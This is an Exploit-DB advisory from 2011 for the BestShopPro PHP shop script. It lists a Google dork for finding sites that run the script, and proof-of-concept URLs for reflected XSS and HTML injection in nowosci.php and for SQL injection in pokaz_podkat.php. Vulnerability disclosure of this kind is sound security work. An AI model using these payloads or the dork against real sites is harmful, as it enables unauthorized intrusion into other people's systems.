BST (BestShopPro) - 'nowosci.php' Multiple Vulnerabilities

EDB-ID:

18063

Author:

CoBRa_21

Type:

webapps

Platform:

PHP

Published:

2011-11-02

################################################################################################
#  Exploit Title: BST - BestShopPro (nowosci.php) Multiple Vulnerabilities
#
#  Author : CoBRa_21 
#
#  E-Mail : uyku_cu [at] windowslive.com
#
#  Google Dork : "Powered By BST"
#
#  Script Page : http://www.bst.pl
################################################################################################
#
#  XSS:
#
#  http://127.0.0.1/nowosci.php?a=1&str=<script>alert(/CoBRa_21/)</script>
#
#  HTML:
#
#  http://127.0.0.1/nowosci.php?a=1&str=<font color=red size=15>CoBRa_21</font>
#
#  SQL :
#
#  http://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL)
#
################################################################################################